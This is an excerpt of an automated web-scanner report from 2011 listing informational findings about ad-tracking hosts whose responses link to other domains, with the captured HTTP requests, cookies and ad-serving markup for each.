<html><body><div><iframe src="http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1"></iframe>
<img src="http://pix04.revsci.net/J10982/b3/0/3/noscript.gif?D=DM_LOC=http://lotame.com?2716=T"><!-- "Network Pixel" c/o "Lotame", segment: 'Tech Savvy' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag --><img src="http://ads.adbrite.com/adserver/behavioral-data/8203?d=2716" width="1" height="1"><!-- List Id = 49760 and List Name = G11742 GST_Tacoma RT -->
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1905337;dcnet=4694;boom=49760;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
...[SNIP]...
13.30. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTc0Njg0NDcyNTQwNDcvMTA0MTIwLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVGhpaXlIaTBCQlctVzV6TXhEOW5FbDgv/s3y_oOCh3r6kEExIjKyijkGnx4A&price=TcvhHwAGp0EK7FrEovpTs1SWtx2tmnBm2xV6cA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRcf1H-HLTcHOGsS1sQezp-mXCtzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCnBjAAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtzIVcp8F8Val1fxHHRvU63fV_G8kg%26client%3Dca-pub-3629939364375984%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070545&bpp=2&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607&correlator=1305207063071&frm=0&adk=3981566363&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=3&dtd=114&xpc=HVEaewoQQ1&p=http%3A//www.milehighonthecheap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:14 GMT
Set-Cookie: mt_mop=4:1305207074; domain=.mathtag.com; path=/; expires=Sun, 11 May 2014 13:31:14 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Thu, 12 May 2011 13:31:10 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x2, ord-bidder-x1
Server: MMBD/3.5.5
Content-Length: 896
Content-Type: text/html
Connection: keep-alive

<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/I36/jview/268359963/direct/01/254397468447254047?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D254397468447254047%26mt_id%3D104120%26mt_adid%3D114%26mt_uuid%3D4dab7d35-b1d2-915a-d3c0-9d57f9c66b07%26redirect%3D"></script>
...[SNIP]...
m/click/img?mt_aid=254397468447254047&mt_id=104120&mt_adid=114&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://clk.atdmt.com/I36/go/268359963/direct/01/254397468447254047" target="_blank"><img border="0" src="http://view.atdmt.com/I36/view/268359963/direct/01/254397468447254047" /></a>
...[SNIP]...
13.31. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTk2NDY1MzI1NDQwMzEvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHBmNzUtYWowd0pHOHN5dWFTWnc1Qm8v/eM1wOfWIxZ9RKD_2JFr8hJB1kM4&price=TcvhHwAGrxsK7Fqwx8QugpKAEgOl8KAu6D5byA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3GM9H-HLTZveGrC1sQeC3ZC-DNzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCxg_AAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtxXQhDQNGr4Rg9Q9u2Yp7R_clKOjA%26client%3Dca-pub-3629939364375984%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070548&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607%2C1110596607&correlator=1305207063071&frm=0&adk=3938665893&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=4&dtd=130&xpc=wcnQKDCP5b&p=http%3A//www.milehighonthecheap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:09 GMT
Last-Modified: Thu, 12 May 2011 13:33:08 GMT
x-mm-dbg: bid not found
x-mm-host: ewr-bidder-x2, ord-bidder-x1
Server: MMBD/3.5.5
Content-Length: 1471
Content-Type: text/html
Connection: keep-alive

<iframe src="http://view.atdmt.com/I36/iview/317592614/direct;wi.160;hi.600/01/254399646532544031?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D254399646532544031%26mt_id%3D115001%26mt_adid%3D114%26mt_uuid%3D4dab7d35-b1d2-915a-d3c0-9d57f9c66b07%26redirect%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
_aid=254399646532544031&mt_id=115001&mt_adid=114&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://clk.atdmt.com/I36/go/317592614/direct;wi.160;hi.600/01/254399646532544031" target="_blank"><img border="0" src="http://view.atdmt.com/I36/view/317592614/direct;wi.160;hi.600/01/254399646532544031" /></a>
...[SNIP]...
13.32. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=pub&id=5aW95q2jLzEvTWpsRk5ETkVPRVl0TlRKRE5TMDBRemRDTFVJeVJVRXRNREU0TVRRNU5rVTJOamN4L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NDAwNDk4MTEwMzk2MTYzNS8xMTUwMDMvMTAwNDcwLzMvUTNBbV9DbnBmUVVnTncyOVZSNGhUbWpqa0w0WkZVdDFnbUFFWWRJanE0RS8/HmZsFV1ZVDb6VABVBJjTE0kobiw&price=3.5500 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:17 GMT
Server: MMBD/3.5.5
Content-Type: text/html
Content-Length: 1751
x-mm-dbg: bid not found
Last-Modified: Thu, 12 May 2011 13:33:17 GMT
x-mm-host: ewr-bidder-x2
Connection: keep-alive

<iframe src="http://view.atdmt.com/I36/iview/317592619/direct;wi.728;hi.90/01/64004981103961635?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D64004981103961635%26mt_id%3D115003%26mt_adid%3D114%26mt_uuid%3D4dab7d35-b1d2-915a-d3c0-9d57f9c66b07%26redirect%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
?mt_aid=64004981103961635&mt_id=115003&mt_adid=114&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://clk.atdmt.com/I36/go/317592619/direct;wi.728;hi.90/01/64004981103961635" target="_blank"><img border="0" src="http://view.atdmt.com/I36/view/317592619/direct;wi.728;hi.90/01/64004981103961635" /></a>
...[SNIP]...
<div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD00MzIwMA==&piggybackCookie=uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07' height='1' width='1'></div>
...[SNIP]...
13.33. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MTM0MjE0MDAzNTE0NzI5Ny8xMDQxMTYvMTAwNDcwLzQvUTNBbV9DbnBmUVVnTncyOVZSNGhUb0ExeVktYXJyQmxKZ3M5dXVjWmx6WS8/69EgstZIwhqHJnL-BZe0wt3Ui58&price=TcvhIQAHJNYK2k2S0EAbL5H9Zd7lJxmGV5n7xQ&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBxwt7IeHLTdbJHJKb6QavtoCCDdzvj_EB-PbyvBH0nISTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0wNzU5NDA5NjE0OTIwNDExoAHg6pnsA7IBEHd3dy5leGFtaW5lci5jb226AQozMDB4MjUwX2FzyAEJ2gF7aHR0cDovL3d3dy5leGFtaW5lci5jb20vZmlnaHQtc3BvcnRzLWluLW5hdGlvbmFsL2NvbXBsZXRlLXd3ZS1zbWFja2Rvd24tc3BvaWxlcnMtZm9yLWZyaWRheS1tYXktMTN0aC1uZXctZmFjZS1hbmQtbmV3LWZldWRzmAK6GMACBMgC1sGMDqgDAegDgAToA4ME9QMABAAEgAbthMCAz_D5j9YB%26num%3D1%26sig%3DAGiWqtwmcx-NetRG7qyZXEYSImLX8YrGgw%26client%3Dca-pub-0759409614920411%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:20 GMT
Server: MMBD/3.5.5
Content-Type: text/html
Content-Length: 891
x-mm-dbg: won
Set-Cookie: mt_mop=4:1305207080; domain=.mathtag.com; path=/; expires=Sun, 11 May 2014 13:31:20 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Thu, 12 May 2011 13:31:13 GMT
x-mm-host: ewr-bidder-x2
Connection: keep-alive

<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/I36/jview/268359912/direct/01/61342140035147297?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D61342140035147297%26mt_id%3D104116%26mt_adid%3D114%26mt_uuid%3D4dab7d35-b1d2-915a-d3c0-9d57f9c66b07%26redirect%3D"></script>
...[SNIP]...
com/click/img?mt_aid=61342140035147297&mt_id=104116&mt_adid=114&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://clk.atdmt.com/I36/go/268359912/direct/01/61342140035147297" target="_blank"><img border="0" src="http://view.atdmt.com/I36/view/268359912/direct/01/61342140035147297" /></a>
...[SNIP]...
13.34. http://bwp.zdnet.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bwp.zdnet.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?dw-siteid=2&dw-ptid=2100&dw-edid=2&dw-ontid=13616 HTTP/1.1
Host: bwp.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:16 GMT
Server: Apache
Expires: Thu May 12 13:33:16 2011 GMT
Cache-Control: no-cache, must-revalidate
P3P: CP="NON DSP COR DEVa PSAa PSDa OUR IND UNI COM", policyref="http://www.cnet.com/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Content-Length: 6389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--ss606-->
<!--layout.21.1-->
<!--tlayout.21-->
<!--unit.1-->
<html>
<head>

...[SNIP]...
<span class="bwheadtext" style="text-decoration:none;"><a href="http://cbsiprivacy.custhelp.com/app/answers/detail/a_id/1272/" target="_new">Sponsored Links</a>
...[SNIP]...
<li><a target="" href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=BC_UycODLTb7QG5z0jQSEooTyCK7DqqMCzoGPmhim6K2JRaDhZxABGAEg0sb1AygCOABQzqjRpwFgyYaFiYikhBCyAQ13d3cuemRuZXQuY29tyAEB2gGCAWh0dHA6Ly93d3cuemRuZXQuY29tL2Jsb2cvY29tcHV0ZXJzL2Nhbi1pbnRlbC1jZWRhci10cmFpbC1hdG9tLXByb2Nlc3NvcnMtYWxvbmctd2l0aC1nb29nbGUtY2hyb21lYm9va3MtcmVzdXJyZWN0LXRoZS1uZXRib29rLzU3NzPAAgTIAs6XrxWoAwHoA-UF6AMF6AMg9QMKAABE&num=1&sig=AGiWqtxFdCxYqya1_e8-9iaMxrbWJpct8Q&client=ca-cnet-zdnet-content&adurl=http://clk.atdmt.com/MRT/go/272504391/direct/01/%3FWT.srch%3D1%26WT.mc_id%3DFBF125FC-DBC8-4FFA-92BF-B3C1FC56E6CD%26CR_SCC%3D200010709" onclick="img_track('http://dw.com.com/redir?ttag=www.Microsoft.com/Cloud&ontid=13616&ptid=2100&edid=2&siteid=2&ltype=bidwar&ctype=bidwar-channel&cval=zdnet-content-blog;ca-cnet-zdnet-content&destUrl=http%3A%2F%2Fimg%2Ecom%2Ecom%2Fb%2Egif');img_track('http://bwp.com.com/click_bwp?bwp2,bwp2.0.0.1437.0.0.17.3.5.5.0..e11062fe9d18c938bc.0.ca-cnet-zdnet-content.zdnet-content-blog,zdnet-content-test.0.www%2EMicrosoft%2Ecom%2FCloud,http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3DL%26ai%3DBC_UycODLTb7QG5z0jQSEooTyCK7DqqMCzoGPmhim6K2JRaDhZxABGAEg0sb1AygCOABQzqjRpwFgyYaFiYikhBCyAQ13d3cuemRuZXQuY29tyAEB2gGCAWh0dHA6Ly93d3cuemRuZXQuY29tL2Jsb2cvY29tcHV0ZXJzL2Nhbi1pbnRlbC1jZWRhci10cmFpbC1hdG9tLXByb2Nlc3NvcnMtYWxvbmctd2l0aC1nb29nbGUtY2hyb21lYm9va3MtcmVzdXJyZWN0LXRoZS1uZXRib29rLzU3NzPAAgTIAs6XrxWoAwHoA%2DUF6AMF6AMg9QMKAABE%26num%3D1%26sig%3DAGiWqtxFdCxYqya1_e8%2D9iaMxrbWJpct8Q%26client%3Dca%2Dcnet%2Dzdnet%2Dcontent%26adurl%3Dhttp%3A%2F%2Fclk%2Eatdmt%2Ecom%2FMRT%2Fgo%2F272504391%2Fdirect%2F01%2F%253FWT%2Esrch%253D1%2526WT%2Emc_id%253DFBF125FC%2DDBC8%2D4FFA%2D92BF%2DB3C1FC56E6CD%2526CR_SCC%253D200010709');return;" onmouseover="return true"><span class="bwtitle">
...[SNIP]...
<li><a target="" href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=BMCBOcODLTb7QG5z0jQSEooTyCKTi8oIC3Ii2iBjAjbcBsNbYARACGAIg0sb1AygCOABQpOXBlPj_____AWDJhoWJiKSEELIBDXd3dy56ZG5ldC5jb23IAQHaAYIBaHR0cDovL3d3dy56ZG5ldC5jb20vYmxvZy9jb21wdXRlcnMvY2FuLWludGVsLWNlZGFyLXRyYWlsLWF0b20tcHJvY2Vzc29ycy1hbG9uZy13aXRoLWdvb2dsZS1jaHJvbWVib29rcy1yZXN1cnJlY3QtdGhlLW5ldGJvb2svNTc3M8gC5IqlG6gDAegD5QXoAwXoAyD1AwoAAEQ&num=2&sig=AGiWqtzWdJyWKN-uh_QttLvKY2f5eXe2Hw&client=ca-cnet-zdnet-content&adurl=http://www.atd-inc.com/intelpage.asp" onclick="img_track('http://dw.com.com/redir?ttag=www.atd-inc.com/intelpage.asp&ontid=13616&ptid=2100&edid=2&siteid=2&ltype=bidwar&ctype=bidwar-channel&cval=zdnet-content-blog;ca-cnet-zdnet-content&destUrl=http%3A%2F%2Fimg%2Ecom%2Ecom%2Fb%2Egif');img_track('http://bwp.com.com/click_bwp?bwp2,bwp2.0.0.1437.0.1.17.3.5.5.0..e1a4d19eb0133102c8.0.ca-cnet-zdnet-content.zdnet-content-blog,zdnet-content-test.0.www%2Eatd%2Dinc%2Ecom%2Fintelpage%2Easp,http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3DL%26ai%3DBMCBOcODLTb7QG5z0jQSEooTyCKTi8oIC3Ii2iBjAjbcBsNbYARACGAIg0sb1AygCOABQpOXBlPj_____AWDJhoWJiKSEELIBDXd3dy56ZG5ldC5jb23IAQHaAYIBaHR0cDovL3d3dy56ZG5ldC5jb20vYmxvZy9jb21wdXRlcnMvY2FuLWludGVsLWNlZGFyLXRyYWlsLWF0b20tcHJvY2Vzc29ycy1hbG9uZy13aXRoLWdvb2dsZS1jaHJvbWVib29rcy1yZXN1cnJlY3QtdGhlLW5ldGJvb2svNTc3M8gC5IqlG6gDAegD5QXoAwXoAyD1AwoAAEQ%26num%3D2%26sig%3DAGiWqtzWdJyWKN%2Duh_QttLvKY2f5eXe2Hw%26client%3Dca%2Dcnet%2Dzdnet%2Dcontent%26adurl%3Dhttp%3A%2F%2Fwww%2Eatd%2Dinc%2Ecom%2Fintelpage%2Easp');return;" onmouseover="return true"><span class="bwtitle">
...[SNIP]...
13.35. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:13 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3939

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
<hr /> \
<a href="http://bit.ly/dKnbdp" target="_blank"><b>
...[SNIP]...
<hr />\
<a href="http://bit.ly/ffdQkR" target="_blank"><b>
...[SNIP]...
13.36. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:31:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&amp;cver=1">here</A>
...[SNIP]...
13.37. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
